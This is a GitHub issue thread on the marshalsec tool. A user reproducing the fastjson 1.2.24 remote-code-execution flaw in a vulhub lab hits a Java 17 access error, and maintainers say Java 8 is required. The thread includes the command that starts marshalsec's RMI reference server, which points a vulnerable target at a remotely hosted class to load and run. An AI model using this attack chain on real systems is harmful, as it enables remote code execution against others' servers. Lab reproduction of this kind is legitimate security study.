mbechler / marshalsec

MIT License

Exception in thread "main" java.lang.IllegalAccessError #42

Closed xiaoqu1 closed 1 year ago

xiaoqu1 commented 1 year ago

Dear community members,

I am running the Kali subsystem under my Windows system, and executing the following commands:

To reproduce the fastjson 1.2.24 vulnerability, I downloaded marshalsec via sudo git clone https://github.com/mbechler/marshalsec.git.

Next, I installed Maven using sudo apt-get install maven.

Then, I compiled marshalsec using mvn clean package -DskipTests.

I ran the command java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.1.7:8888/#TouchFile 2335, and sent the data packet through bp, after which I received the following output:

The target machine's IP is 192.168.1.8, and the fastjson vulnerability environment is set up using vulhub (https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce).

The IP of the Kali subsystem is 192.168.1.7, and its Java environment version is 17.0.6 2023-01-17:

java --version

openjdk 17.0.6 2023-01-17

OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)

OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)

As I am not very familiar with Java, I am unsure how to correct this error. Any advice or suggestions would be greatly appreciated. Thank you very much for your assistance.

ecki commented 1 year ago
The README clearly states that "Java 8 required"; if you want to use newer versions, it might not work or you need --add-opens.

Regards, Bernd -- http://bernd.eckenfels.net

xiaoqu1 commented 1 year ago

Thank you very much for your response. I apologize for not paying enough attention.

mbechler commented 1 year ago

I think none of the relevant classes have been removed (yet), but with Java 17 starting to enforce module access and requiring manual configuration to work around that, sticking to earlier versions is the more sensible option (and with Java > 8, accept the access warnings).